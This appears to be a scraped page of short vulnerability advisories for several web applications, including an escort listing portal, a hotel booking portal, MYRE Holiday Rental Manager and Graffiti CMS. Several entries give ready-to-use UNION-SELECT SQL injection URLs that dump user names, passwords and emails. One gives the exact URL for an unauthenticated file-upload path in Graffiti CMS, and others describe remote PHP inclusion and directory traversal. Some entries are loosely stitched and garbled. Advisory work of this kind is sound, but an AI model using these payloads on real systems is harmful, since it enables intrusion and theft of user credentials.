An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. This will allow the attacker to view the contents of any file on the server, including sensitive files such as configuration files, source code, etc.
This is a Blind SQL Injection bug but into the database there aren't very reserved information such as usernames and/or passwords. However this injection can be used to write arbitrary fiels into the database.
An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal sequences (e.g., “../”) to the vulnerable application. This can allow the attacker to access arbitrary files and directories stored on the web server.
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'root_path' parameter to '/admin/admin_news_bot.php' script. A remote attacker can send a specially crafted HTTP request with malicious code in the 'root_path' parameter and execute arbitrary PHP code on the vulnerable system.
A SQL injection vulnerability exists in the profile.php page of the Adult Portal escort listing website (www.tourismscripts.com). An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the profile.php page with the user_id parameter set to -1'+UNION+SELECT+0,CONCAT_WS(0x3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+member/* or www.TraGeT.CoM/profile.php?user_id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
The vulnerability exists due to insufficient filtration of user-supplied data passed via the 'sitetext_id' parameter to the '/aboutus.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application database, gain access to sensitive data, modify data, etc.
The Accommodation Hotel Booking Portal is vulnerable to a remote SQL injection vulnerability. Attackers can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by appending malicious SQL queries to the vulnerable parameter 'hotel_id' in the URL. For example, www.TraGeT.CoM/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*.
An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The attacker can inject malicious SQL code in the 'cat_id' parameter of the 'download.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to disclose sensitive information from the database, modify data, compromise the system, etc.
A remote SQL injection vulnerability exists in MYRE Holiday Rental Manager. An attacker can send a specially crafted HTTP request to review.php with the action parameter set to show_review and link_id set to 1+UNION+SELECT+0,0,concat_ws(0x3a3a,member_name,member_password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+members-- or 1+UNION+SELECT+0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+multiavailability_calendars--, to view sensitive information from the database.
Graffiti CMS includes a file manager component that allows unauthenticated users to upload files (including asp.net pages which allow code execution). All versions are affected by this vulnerability. To exploit this issue, it only suffices to access to the following URL: http://DOMAIN_TLD/GRAFFITI_CMS_INSTALL_DIR/__utility/Telligent_Editor/editor/filemanager/browser/default/browser.html?connector=../../connectors/aspx/connector.aspx
Services By CQR